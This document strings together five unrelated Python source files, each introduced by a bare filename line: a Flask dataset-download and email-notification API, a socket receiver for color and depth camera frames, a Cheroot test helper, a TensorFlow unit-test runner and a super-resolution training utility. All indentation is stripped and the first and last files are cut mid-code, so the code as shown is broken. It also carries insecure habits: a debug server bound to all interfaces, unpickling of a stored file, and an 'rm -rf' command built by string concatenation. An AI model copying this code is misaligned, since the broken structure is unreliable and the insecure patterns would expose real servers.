# attachment_filename="{}{}".format(path.split('-')[0], extension))
return send_from_directory(DOWNLOAD_LOCATION, path, mimetype=mime_type, as_attachment=True,
attachment_filename="{}{}".format(path.split('-')[0], extension))
else:
return not_found()
@app.route('/api/data/cancel/<string:path>', strict_slashes=False, methods=['GET'])
def cancel_download(path):
if os.path.exists(DOWNLOAD_HISTORY):
with open(DOWNLOAD_HISTORY, 'rb') as fp:
download_history = pickle.load(fp)
else:
print('Problem managing processes...')
if path in download_history.keys():
pid = download_history[path].pid
try:
p = ProcessManager(pid)
if p.is_running():
p.kill()
except NoSuchProcess as e:
print(e)
if os.path.exists(os.path.join(DOWNLOAD_LOCATION, '{}incomplete'.format(path))):
os.remove(os.path.join(DOWNLOAD_LOCATION, '{}incomplete'.format(path)))
if os.path.exists(os.path.join(DOWNLOAD_LOCATION, path)):
os.remove(os.path.join(DOWNLOAD_LOCATION, path))
return jsonify({'status': 'success'})
@app.route('/api/data/notify/<string:path>', strict_slashes=False, methods=['POST'])
def notify(path):
email = request.form.get('email')
name = request.form.get('name')
if os.path.exists(DOWNLOAD_HISTORY):
with open(DOWNLOAD_HISTORY, 'rb') as fp:
download_history = pickle.load(fp)
if path not in download_history.keys():
return not_found('No job found')
else:
download_history[path].email = email
download_history[path].name = name
with open(DOWNLOAD_HISTORY, 'wb') as fp:
pickle.dump(download_history, fp)
if os.path.exists(os.path.join(DOWNLOAD_LOCATION, path)):
send_email(path, email, name)
return jsonify({'status': 'success'})
@app.route('/api/datasets/<string:dataset_id>/query/', strict_slashes=False, methods=['POST'])
def query(dataset_id):
dataset = get_dataset(dataset_id)
if dataset is None:
return not_found()
try:
query = request.form.get('query')
options = json.loads(request.form.get('options'))
except Exception:
return bad_request()
if 'fileformat' not in options:
return bad_request()
file_format = options['fileformat']
gzip_output = options['gzip'] if ('gzip' in options) else False
if gzip_output:
mime_type = MIME_TYPES['gzip']
else:
mime_type = MIME_TYPES[file_format]
# TODO: Validate query before starting response
filename = '{}-{}'.format(dataset_id, uuid.uuid4().hex[:8])
if file_format == 'csv':
filename += ".csv"
elif file_format == 'json':
filename += ".json"
elif file_format == 'pickle':
filename += '.pkl'
elif file_format == 'tsv':
filename += '.tsv'
elif file_format == 'hdf5':
filename += '.h5'
elif file_format == 'arff':
filename += '.arff'
elif file_format == 'excel':
filename += '.xlsx'
elif file_format == 'feather':
filename += '.feather'
elif file_format == 'msgpack':
filename += '.msgpack'
elif file_format == 'parquet':
filename += '.pq'
elif file_format == 'stata':
filename += '.dta'
elif file_format == 'sqlite':
filename += '.sql'
elif file_format == 'html':
filename += '.html'
else:
filename += ".csv"
if gzip_output:
filename += '.gz'
p = Process(target=create_dataset, args=(dataset, query, file_format, gzip_output, DOWNLOAD_LOCATION, filename))
p.start()
if os.path.exists(DOWNLOAD_HISTORY):
with open(DOWNLOAD_HISTORY, 'rb') as fp:
download_history = pickle.load(fp)
else:
download_history = {}
with open(DOWNLOAD_HISTORY, 'wb') as fp:
download_history[filename] = GeneyJob(p.pid, filename)
pickle.dump(download_history, fp)
return jsonify({'download_path': filename})
def not_found(error='not found'):
return make_response(jsonify({'error': error}), 404)
def bad_request(error='bad request'):
return make_response(jsonify({'error': error}), 400)
def reload_datasets():
global DATASETS_LOADED
try:
DATASETS_LOADED = False
load_datasets()
return make_response('success', 200)
except Exception:
return make_response('error', 500)
def create_dataset(dataset: GeneyDataset, query, file_format, gzip_output, download_location, filename):
dataset.query(query, file_format, gzip_output, download_location, filename)
if os.path.exists(DOWNLOAD_HISTORY):
with open(DOWNLOAD_HISTORY, 'rb') as fp:
download_history = pickle.load(fp)
if filename in download_history.keys():
if download_history[filename].email is not None:
send_email(filename, download_history[filename].email, download_history[filename].name)
else:
print('problem with history')
def send_email(path, email, name):
s = smtplib.SMTP(host='smtp.gmail.com', port=587)
s.starttls()
s.login(EMAIL_USER, EMAIL_PASS)
subject = 'Geney Data Complete'
path = '{}/api/data/download/{}'.format(URL, path)
message = EmailMessage()
message['From'] = 'Geney'
message['To'] = email
message['Subject'] = subject
message.set_content('{},\nThank you for your patience! Here is your data: {}'.format(name, path))
s.send_message(message)
COMMANDS['reload'] = reload_datasets
app.register_error_handler(404, not_found)
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', port=8889)
|
sensor_receiver_ros.py
|
import sys
import argparse
import socket
import struct
from collections import namedtuple
import cv2
import numpy as np
import multiprocessing
# Each port corresponds to a single stream type
STREAM_PORTS = {
"color": 10080,
"depth": 10081
}
SENSOR_STREAM_HEADER_FORMAT = "@qIIIIffffffffffffffffffff"
SENSOR_FRAME_STREAM_HEADER = namedtuple(
'SensorFrameStreamHeader',
[ 'Timestamp', 'ImageWidth', 'ImageHeight', 'PixelStride', 'BytesLength',
'FocalLengthX','FocalLengthY','PrincipalPointX','PrincipalPointY',
'CameraPoseM11', 'CameraPoseM12', 'CameraPoseM13', 'CameraPoseM14',
'CameraPoseM21', 'CameraPoseM22', 'CameraPoseM23', 'CameraPoseM24',
'CameraPoseM31', 'CameraPoseM32', 'CameraPoseM33', 'CameraPoseM34',
'CameraPoseM41', 'CameraPoseM42', 'CameraPoseM43', 'CameraPoseM44']
)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--host",
help="Host address to connect", default="192.168.50.202")
parser.add_argument("--type",
help="sensor type", default="color")
args = parser.parse_args()
return args
def create_socket():
# Create a TCP Stream socket
try:
ss = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
return ss
except socket.error as msg:
print("=> [ERROR] Failed to create socket!!!")
print(" *" + msg)
sys.exit()
def main(host, sensor_type):
"""Receiver main"""
port = STREAM_PORTS[sensor_type]
timeout_counter = 0
socket.setdefaulttimeout(3)
try:
while True:
ss = create_socket()
try:
ss.connect((host, port))
print("=> [INFO] Connection success... ({}:{})".format(host, port))
pass
except Exception:
ss.close()
timeout_counter +=1
print('=> [ERROR]: Connection failed ({})!!! ({}:{})'.format(timeout_counter,host, port))
print(" *Try to reconnect 3 seconds later")
continue
while True:
# Receive the header
try:
header_data = ss.recv(struct.calcsize(SENSOR_STREAM_HEADER_FORMAT))
except Exception:
ss.close()
break
header_data = struct.unpack(SENSOR_STREAM_HEADER_FORMAT, header_data)
header = SENSOR_FRAME_STREAM_HEADER(*header_data)
print(header)
# Read the image in chunks
image_data = b""
while len(image_data) < header.BytesLength:
remaining_bytes = header.BytesLength - len(image_data)
image_data_chunk = ss.recv(remaining_bytes)
if not image_data_chunk:
print('=> [ERROR]: Failed to receive image data')
break
# sys.exit()
image_data += image_data_chunk
if len(image_data) != header.BytesLength:
break
# Depth image
if header.PixelStride==2:
image_array = np.frombuffer(image_data, dtype=np.uint16).copy()
image_array = image_array.reshape((header.ImageHeight, header.ImageWidth, -1))
image_array = cv2.applyColorMap(cv2.convertScaleAbs(image_array, alpha=0.03), cv2.COLORMAP_JET)
# Color image BGRA8
if header.PixelStride==4:
image_array = np.frombuffer(image_data, dtype=np.uint8).copy()
image_array = image_array.reshape((header.ImageHeight, header.ImageWidth, -1))
# Color image BGR8
if header.PixelStride==3:
image_array = np.frombuffer(image_data, dtype=np.uint8).copy()
image_array = image_array.reshape((header.ImageHeight, header.ImageWidth, -1))
# Display image
cv2.imshow('Stream Preview', image_array)
if cv2.waitKey(1) & 0xFF == ord('q'):
# break
cv2.destroyAllWindows()
ss.close()
print('=> [INFO]: Socket close success')
sys.exit()
except KeyboardInterrupt:
cv2.destroyAllWindows()
ss.close()
print('=> [INFO]: Socket close success')
if __name__ == "__main__":
args = parse_args()
host = args.host
sensor_type = args.type.lower()
if sensor_type == "all":
p1 = multiprocessing.Process(target=main,args=(host, "color",),name="ColorSensor")
p2 = multiprocessing.Process(target=main,args=(host, "depth",),name="DepthSensor")
p1.start()
p2.start()
p1.join()
p2.join()
else:
main(host=host, sensor_type=sensor_type)
|
helper.py
|
"""A library of helper functions for the Cheroot test suite."""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import datetime
import logging
import os
import sys
import time
import threading
import types
from six.moves import http_client
import six
import cheroot.server
import cheroot.wsgi
from cheroot.test import webtest
log = logging.getLogger(__name__)
thisdir = os.path.abspath(os.path.dirname(__file__))
config = {
'bind_addr': ('127.0.0.1', 54583),
'server': 'wsgi',
'wsgi_app': None,
}
class CherootWebCase(webtest.WebCase):
"""Helper class for a web app test suite."""
script_name = ''
scheme = 'http'
available_servers = {
'wsgi': cheroot.wsgi.Server,
'native': cheroot.server.HTTPServer,
}
@classmethod
def setup_class(cls):
"""Create and run one HTTP server per class."""
conf = config.copy()
conf.update(getattr(cls, 'config', {}))
s_class = conf.pop('server', 'wsgi')
server_factory = cls.available_servers.get(s_class)
if server_factory is None:
raise RuntimeError('Unknown server in config: %s' % conf['server'])
cls.httpserver = server_factory(**conf)
cls.HOST, cls.PORT = cls.httpserver.bind_addr
if cls.httpserver.ssl_adapter is None:
ssl = ''
cls.scheme = 'http'
else:
ssl = ' (ssl)'
cls.HTTP_CONN = http_client.HTTPSConnection
cls.scheme = 'https'
v = sys.version.split()[0]
log.info('Python version used to run this test script: %s' % v)
log.info('Cheroot version: %s' % cheroot.__version__)
log.info('HTTP server version: %s%s' % (cls.httpserver.protocol, ssl))
log.info('PID: %s' % os.getpid())
if hasattr(cls, 'setup_server'):
# Clear the wsgi server so that
# it can be updated with the new root
cls.setup_server()
cls.start()
@classmethod
def teardown_class(cls):
"""Cleanup HTTP server."""
if hasattr(cls, 'setup_server'):
cls.stop()
@classmethod
def start(cls):
"""Load and start the HTTP server."""
threading.Thread(target=cls.httpserver.safe_start).start()
while not cls.httpserver.ready:
time.sleep(0.1)
@classmethod
def stop(cls):
"""Terminate HTTP server."""
cls.httpserver.stop()
td = getattr(cls, 'teardown', None)
if td:
td()
date_tolerance = 2
def assertEqualDates(self, dt1, dt2, seconds=None):
"""Assert ``abs(dt1 - dt2)`` is within ``Y`` seconds."""
if seconds is None:
seconds = self.date_tolerance
if dt1 > dt2:
diff = dt1 - dt2
else:
diff = dt2 - dt1
if not diff < datetime.timedelta(seconds=seconds):
raise AssertionError(
'%r and %r are not within %r seconds.' %
(dt1, dt2, seconds),
)
class Request:
"""HTTP request container."""
def __init__(self, environ):
"""Initialize HTTP request."""
self.environ = environ
class Response:
"""HTTP response container."""
def __init__(self):
"""Initialize HTTP response."""
self.status = '200 OK'
self.headers = {'Content-Type': 'text/html'}
self.body = None
def output(self):
"""Generate iterable response body object."""
if self.body is None:
return []
elif isinstance(self.body, six.text_type):
return [self.body.encode('iso-8859-1')]
elif isinstance(self.body, six.binary_type):
return [self.body]
else:
return [x.encode('iso-8859-1') for x in self.body]
class Controller:
"""WSGI app for tests."""
def __call__(self, environ, start_response):
"""WSGI request handler."""
req, resp = Request(environ), Response()
try:
# Python 3 supports unicode attribute names
# Python 2 encodes them
handler = self.handlers[environ['PATH_INFO']]
except KeyError:
resp.status = '404 Not Found'
else:
output = handler(req, resp)
if (
output is not None
and not any(
resp.status.startswith(status_code)
for status_code in ('204', '304')
)
):
resp.body = output
try:
resp.headers.setdefault('Content-Length', str(len(output)))
except TypeError:
if not isinstance(output, types.GeneratorType):
raise
start_response(resp.status, resp.headers.items())
return resp.output()
|
tf_unittest_runner.py
|
# ==============================================================================
# Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
# ==============================================================================
import unittest
import sys
import argparse
import os
import re
import fnmatch
import time
import warnings
from datetime import timedelta
from fnmatch import fnmatch
import multiprocessing
mpmanager = multiprocessing.Manager()
mpmanager_return_dict = mpmanager.dict()
try:
import xmlrunner
except:
os.system('pip install unittest-xml-reporting')
import xmlrunner
os.environ['OPENVINO_TF_DISABLE_DEASSIGN_CLUSTERS'] = '1'
"""
tf_unittest_runner is primarily used to run tensorflow python
unit tests using ngraph
"""
def main():
parser = argparse.ArgumentParser()
optional = parser._action_groups.pop()
required = parser.add_argument_group('required arguments')
required.add_argument(
'--tensorflow_path',
help=
"Specify the path to Tensorflow source code. Eg:openvino_tensorflow/build_cmake/tensorflow \n",
required=True)
optional.add_argument(
'--list_tests',
help=
"Prints the list of test cases in this package. Eg:math_ops_test.* \n")
optional.add_argument(
'--list_tests_from_file',
help=
"""Reads the test names/patterns specified in a manifest file and displays a consolidated list.
Eg:--list_tests_from_file=tests_linux_cpu.txt""")
optional.add_argument(
'--run_test',
help=
"Runs the testcase(s), specified by name or pattern. Eg: math_ops_test.DivNoNanTest.testBasic or math_ops_test.*"
)
optional.add_argument(
'--run_tests_from_file',
help="""Reads the test names specified in a manifest file and runs them.
Eg:--run_tests_from_file=tests_to_run.txt""")
optional.add_argument(
'--xml_report',
help=
"Generates results in xml file for jenkins to populate in the test result \n"
)
optional.add_argument(
'--verbose',
action="store_true",
help="Prints standard out if specified \n")
optional.add_argument(
'--print_support_vector',
action="store_true",
help=
"Prints support vector from a device specific manifest file in True/False format\n"
)
optional.add_argument(
'--timeout',
type=int,
default=60,
action="store",
help="Timeout to skip a test if it hangs\n")
parser._action_groups.append(optional)
arguments = parser.parse_args()
xml_report = arguments.xml_report
if (arguments.list_tests):
test_list = get_test_list(arguments.tensorflow_path,
arguments.list_tests)
print('\n'.join(sorted(test_list[0])))
print('Total:', len(test_list[0]))
return True
if (arguments.list_tests_from_file):
test_list, skip_list = read_tests_from_manifest(
arguments.list_tests_from_file, arguments.tensorflow_path)
print('\n'.join(sorted(test_list)))
print('Total:', len(test_list), 'Skipped:', len(skip_list))
if (arguments.print_support_vector):
print("\n----------------------------------\n")
all_tests = test_list | skip_list
for test in sorted(all_tests):
if test in test_list:
print("True")
elif test in skip_list:
print("False")
return True
if (arguments.run_test):
invalid_list = []
start = time.time()
test_list = get_test_list(arguments.tensorflow_path, arguments.run_test)
for test in test_list[1]:
if test is not None:
invalid_list.append(test_list[1])
result_str = "\033[91m INVALID \033[0m " + test + \
'\033[91m' + '\033[0m'
print('TEST:', result_str)
test_results = run_test(
sorted(test_list[0]), xml_report, (2 if arguments.verbose else 0))
elapsed = time.time() - start
print("\n\nTesting results\nTime elapsed: ",
str(timedelta(seconds=elapsed)))
return check_and_print_summary(test_results, test_list[1])
if (arguments.run_tests_from_file):
invalid_list = []
start = time.time()
list_of_tests = read_tests_from_manifest(arguments.run_tests_from_file,
arguments.tensorflow_path)[0]
test_results = run_test(
sorted(list_of_tests), xml_report, (2 if arguments.verbose else 0),
arguments.timeout)
elapsed = time.time() - start
print("\n\nTesting results\nTime elapsed: ",
str(timedelta(seconds=elapsed)))
return check_and_print_summary(test_results, invalid_list)
return True
def get_test_list(tf_path, test_regex):
accepted_formats = [
"*test*", "math_ops_test.DivNoNanTest.testBasic",
"math_ops_test.DivNoNanTest.*", "math_ops_test.D*", "math_ops_test.*",
"math_*_test", "math_*_*_test", "math*_test"
]
try:
module_list = regex_walk(tf_path, test_regex)
except Exception as e:
module_list = []
print(
"Exception occured in regex_walk (" + test_regex + ") -> " +
str(e) +
"""\nInvalid module name. Use bazel query below to get list of tensorflow python test modules.
bazel query 'kind(".*_test rule", //tensorflow/python:nn_test)' --output label\n"""
)
try:
test_list = list_tests(module_list, test_regex)
except Exception as e:
test_list = [[], []]
print(
"Exception occured in list_tests. " + str(e) +
"\nEnter a valid argument to --list_tests or --run_test.\n \nLIST OF ACCEPTED FORMATS:"
)
print('\n'.join(accepted_formats))
return test_list
def regex_walk(dirname, regex_input):
"""
Adds all the directories under the specified dirname to the system path to
be able to import the modules.
Args:
dirname: This is the tensorflow_path passed as an argument is the path to
tensorflow source code.
regex_input: Regular expression input string to filter and list/run tests.
Few examples of accepted regex_input are:
math_ops_test.DivNoNanTest.testBasic
math_ops_test.DivNoNanTest.*
math_ops_test.D*
math_ops_test.*
math_*_test
math_*_*_test
math*_test
"""
if (re.search(r'\.', regex_input) is None):
# a module name regex was given
test = regex_input + '.py'
else:
# regex has dot(s) e.g. module.class.testfunc
test = (re.split("\.", regex_input))[0] + '.py'
module_list = []
for path, subdirs, files in os.walk(dirname):
for name in files:
if fnmatch(name, test):
if path not in sys.path:
sys.path.append(os.path.abspath(path))
name = os.path.splitext(name)[0]
module_list.append(name)
if not module_list:
print("Test pattern/name does not exist:", regex_input, "dirname",
dirname)
return module_list
def list_tests(module_list, regex_input):
"""
Generates a list of test suites and test cases from a TF test target
specified.
Args:
module_list: This is a list tensorflow test target names passed as an argument.
Example --list_tests=math_ops_test.R*
To get the list of tensorflow python test modules, query using bazel.
bazel query 'kind(".*_test rule", //tensorflow/python/...)' --output label
regex_input: Regular expression input strings to filter and list tests.
Few examples of accepted regex_input are:
math_ops_test.DivNoNanTest.testBasic
math_ops_test.DivNoNanTest.* (or math_ops_test.DivNoNanTest)
math_ops_test.D*
math_ops_test.*
math_*_test
math_*_*_test
math*_test
"""
loader = unittest.TestLoader()
alltests = []
listtests = []
invalidtests = []
for test_module in module_list:
try:
moduleobj = __import__(test_module)
except Exception as e:
print("Exception in __import__({})".format(test_module), 'ERROR:',
str(e))
module_list.remove(test_module)
continue
try:
test_suites = loader.loadTestsFromModule(moduleobj)
except Exception as e:
print(
"Exception in loader.loadTestsFromModule({})".format(moduleobj),
'ERROR:', str(e))
module_list.remove(test_module)
continue
for a_testsuite in test_suites:
for a_testcase in a_testsuite:
alltests.append(a_testcase.id())
# change module.class to module.class.*
regex_input = regex_input + ('.*' if (regex_input.count('.') == 1) else '')
regex_pattern = '^' + regex_input + '$'
regex_pattern = re.sub(r'\.', '\\.', regex_pattern)
regex_pattern = re.sub(r'\*', '.*', regex_pattern)
for a_testcase_id in alltests:
if re.search(regex_pattern, a_testcase_id):
listtests.append(a_testcase_id)
if not listtests:
invalidtests.append(regex_input)
return listtests, invalidtests
def read_tests_from_manifest(manifestfile,
tensorflow_path,
g_imported_files=set()):
"""
Reads a file that has include & exclude patterns,
Returns a list of leaf-level single testcase, no duplicates
"""
run_items = set()
skipped_items = set()
g_imported_files.add(manifestfile)
assert os.path.isfile(manifestfile), "Could not find the file"
with open(manifestfile) as fh:
curr_section = ''
for line in fh.readlines():
line = line.split('#')[0].rstrip('\n').strip(' ')
if line == '':
continue
if re.search(r'\[IMPORT\]', line):
curr_section = 'import_section'
continue
if re.search(r'\[RUN\]', line):
curr_section = 'run_section'
continue
if re.search(r'\[SKIP\]', line):
curr_section = 'skip_section'
continue
if curr_section == 'import_section':
if not os.path.isabs(line):
line = os.path.abspath(
os.path.dirname(manifestfile) + '/' + line)
if line in g_imported_files:
sys.exit("ERROR: re-import of manifest " + line + " in " +
manifestfile)
g_imported_files.add(line)
new_runs, new_skips = read_tests_from_manifest(
line, tensorflow_path, g_imported_files)
assert (new_runs.isdisjoint(new_skips))
run_items |= new_runs
skipped_items |= new_skips
run_items -= skipped_items
continue
if curr_section == 'run_section':
new_runs = set(get_test_list(tensorflow_path, line)[0])
skipped_items -= new_runs
run_items |= new_runs
if curr_section == 'skip_section':
new_skips = set(get_test_list(tensorflow_path, line)[0])
new_skips = set([x for x in new_skips if x in run_items])
run_items -= new_skips
skipped_items |= new_skips
assert (run_items.isdisjoint(skipped_items))
print('\n#Tests to Run={}, Skip={} (manifest = {})\n'.format(
len(run_items), len(skipped_items), manifestfile))
return run_items, skipped_items
def func_utrunner_testcase_run(return_dict, runner, a_test):
# This func runs in a separate process
try:
test_result = runner.run(a_test)
success = test_result.wasSuccessful()
return_dict[a_test.id()] = {
'wasSuccessful': success,
'failures': [] if (success) else [('', test_result.failures[0][1])],
'errors': [],
'skipped': []
}
except Exception as e:
#print('DBG: func_utrunner_testcase_run test_result.errors', test_result.errors, '\n')
return_dict[a_test.id()] = {
'wasSuccessful': False,
'failures': [('', test_result.errors[0][1])],
'errors': [('', test_result.errors[0][1])],
'skipped': []
}
def run_singletest_in_new_child_process(runner, a_test):
mpmanager_return_dict.clear()
return_dict = mpmanager_return_dict
p = multiprocessing.Process(
target=func_utrunner_testcase_run, args=(return_dict, runner, a_test))
p.start()
p.join()
# A negative exitcode -N indicates that the child was terminated by signal N.
if p.exitcode != 0:
error_msg = '!!! RUNTIME ERROR !!! Test ' + a_test.id(
) + ' exited with code: ' + str(p.exitcode)
print(error_msg)
return_dict[a_test.id()] = {
'wasSuccessful': False,
'failures': [('', error_msg)],
'errors': [('', error_msg)],
'skipped': []
}
return return_dict[a_test.id()]
test_result_map = return_dict[a_test.id()]
return test_result_map
def timeout_handler(signum, frame):
raise Exception("Test took too long to run. Skipping.")
def run_singletest(testpattern, runner, a_test, timeout):
# This func runs in the same process
mpmanager_return_dict.clear()
return_dict = mpmanager_return_dict
import signal
signal.signal(signal.SIGALRM, timeout_handler)
# set timeout here
signal.alarm(timeout)
try:
test_result = runner.run(a_test)
success = test_result.wasSuccessful()
return_dict[a_test.id()] = {
'wasSuccessful': success,
'failures': [] if (success) else [('', test_result.failures[0][1])],
'errors': [],
'skipped': []
}
except Exception as e:
#print('DBG: func_utrunner_testcase_run test_result.errors', test_result.errors, '\n')
error_msg = '!!! RUNTIME ERROR !!! Test ' + a_test.id()
print(error_msg)
return_dict[a_test.id()] = {
'wasSuccessful': False,
'failures': [('', test_result.errors[0][1])],
'errors': [('', test_result.errors[0][1])],
'skipped': []
}
return return_dict[a_test.id()]
def run_test(test_list, xml_report, timeout=60, verbosity=0):
"""
Runs a specific test suite or test case given with the fully qualified
test name and prints stdout.
Args:
test_list: This is the list of tests to run,filtered based on the
regex_input passed as an argument.
Example: --run_test=math_ops_test.A*
verbosity: Python verbose logging is set to 2. You get the help string
of every test and the result.
"""
loader = unittest.TestLoader()
suite = unittest.TestSuite()
succeeded = []
failures = []
skipped = []
run_test_counter = 0
if xml_report is not None:
for testpattern in test_list:
tests = loader.loadTestsFromName(testpattern)
suite.addTest(tests)
assert os.path.isfile(xml_report), "Could not find the file"
with open(xml_report, 'wb') as output:
sys.stdout = open(os.devnull, "w")
sys.stderr = open(os.devnull, "w")
test_result = xmlrunner.XMLTestRunner(
output=output, verbosity=verbosity).run(suite)
sys.stderr = sys.__stderr__
sys.stdout = sys.__stdout__
failures.extend(test_result.failures)
failures.extend(test_result.errors)
succeeded.extend(test_result.successes)
summary = {"TOTAL": test_list, "PASSED": succeeded, "FAILED": failures}
return summary
else:
runner = unittest.TextTestRunner(verbosity=verbosity)
for testpattern in test_list:
testsuite = loader.loadTestsFromName(testpattern)
for a_test in testsuite:
print()
run_test_counter += 1
print('>> >> >> >> ({}) Testing: {} ...'.format(
run_test_counter, a_test.id()))
start = time.time()
if os.getenv('OPENVINO_TF_BACKEND', default="CPU") == "MYRIAD":
test_result_map = run_singletest(testpattern, runner,
a_test, timeout)
else:
test_result_map = run_singletest_in_new_child_process(
runner, a_test)
elapsed = time.time() - start
elapsed = str(timedelta(seconds=elapsed))
if test_result_map['wasSuccessful'] == True:
succeeded.append(a_test.id())
result_str = " \033[92m OK \033[0m " + a_test.id()
elif 'failures' in test_result_map and bool(
test_result_map['failures']):
failures.append(test_result_map['failures'])
result_str = " \033[91m FAIL \033[0m " + a_test.id() + \
'\n\033[91m' + ''.join(test_result_map['failures'][0][1]) + '\033[0m'
elif 'errors' in test_result_map and bool(
test_result_map['errors']):
failures.append(test_result_map['errors'])
result_str = " \033[91m FAIL \033[0m " + a_test.id() + \
'\n\033[91m' + ''.join(test_result_map['errors'][0][1]) + '\033[0m'
if 'skipped' in test_result_map and bool(
test_result_map['skipped']):
skipped.append(test_result_map['skipped'])
print('took', elapsed, 'RESULT =>', result_str)
summary = {
"TOTAL": test_list,
"PASSED": succeeded,
"SKIPPED": skipped,
"FAILED": failures,
}
return summary
def check_and_print_summary(test_results, invalid_list):
print('========================================================')
print("TOTAL: ", len(test_results['TOTAL']))
print("PASSED: ", len(test_results['PASSED']))
if len(test_results['SKIPPED']) > 0:
print(" with skipped: ", len(test_results['SKIPPED']))
print("FAILED: ", len(test_results['FAILED']))
if (len(invalid_list) > 0):
print("INVALID: ", len(invalid_list))
print('========================================================\n')
if len(test_results['FAILED']) == 0:
return True
else:
return False
if __name__ == '__main__':
with warnings.catch_warnings():
warnings.simplefilter("ignore")
status = main()
if status == False:
raise Exception("Tests failed")
|
utility.py
|
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
class checkpoint():
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment', args.save)
else:
self.dir = os.path.join('..', 'experiment', args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model'), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
open_type = 'a' if os.path.exists(self.get_path('log.txt'))else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = 'SR on {}'.format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label='Scale {}'.format(scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(d)))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, dataset, filename, save_list, scale):
if self.args.save_results:
filename = self.get_path(
'results-{}'.format(dataset.dataset.name),
'{}_x{}_'.format(filename, scale)
)
postfix = ('SR', 'LR', 'HR')
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(('{}{}.png'.format(filename, p), tensor_cpu))
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
# HCC Hack
#pixel_range /= 1.014176
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1: return 0
diff = (sr - hr) / rgb_range
if dataset and dataset.dataset.benchmark:
shave = scale
if diff.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
else:
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
return -10 * math.log10(mse)
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
from scipy import signal
from skimage.measure import compare_ssim
def matlab_style_gauss2D(shape=(3,3),sigma=0.5):
